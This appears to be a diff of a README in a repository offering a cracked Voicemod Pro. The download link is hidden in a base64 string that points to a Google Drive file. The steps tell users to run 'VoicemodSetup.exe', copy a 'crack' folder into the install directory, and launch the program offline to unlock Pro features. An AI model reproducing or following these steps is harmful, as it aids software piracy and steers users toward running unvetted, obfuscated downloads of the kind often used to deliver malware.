JENOVAAbsolute/128-Bit-Bay-Software/README.md

 `aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2ZpbGUvZC8xbm94eTQ4ZkJhLTZWQ2wtV0FLX20xVXo5bG1MVm1QNUwvdmlldz91c3A9c2hhcmluZw==`

 **Installation steps:**
-1. Disconnect from the internet
-2. Run “VoicemodSetup.exe”
+1. Run “VoicemodSetup.exe”
-3. Install the software
+2. Install the software
+3. Disconnect from the internet
 4. Copy the contents of the crack folder to the install folder of Voicemod Pro
 5. Done

+*Note: Launch the software while disconnected from the internet, then reconnect to access the Pro voices.*

 # ARTISTS AND DESIGNERS